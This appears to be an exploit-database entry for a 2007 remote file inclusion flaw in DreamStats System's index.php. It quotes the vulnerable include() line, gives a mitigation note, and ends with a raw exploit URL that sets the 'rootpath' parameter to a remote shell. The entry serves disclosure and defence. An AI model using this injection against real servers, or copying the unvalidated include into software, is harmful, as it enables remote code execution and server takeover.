header-logo
Suggest Exploit
vendor:
by:
ThE dE@Th
7.5
CVSS
HIGH
Code Execution
94
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Code Execution Vulnerability in index.php

The vulnerability allows an attacker to execute arbitrary code on the server by exploiting a parameter in the index.php file. The attacker can provide a malicious value for the 'rootpath' parameter, which is not properly validated or sanitized, allowing for remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques on the 'rootpath' parameter. Additionally, ensure that the server is running the latest patched version of the software.
Source

Exploit-DB raw data:

ConTact Me:-wWw.Asb-May.Net
ScRiPt:-http://callofduty.filefront.com/file/DreamStats_System;54520
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs TeAm}>>
******************************************************************************
index.php:-
if (!$slots) {include($rootpath . 'html/serveroffline.php');exit;}
********************************************************************************
ExPlOiT:-http://www.Site.com/PaTh/index.php?rootpath=[Shell]
********************************************************************************

# milw0rm.com [2007-02-02]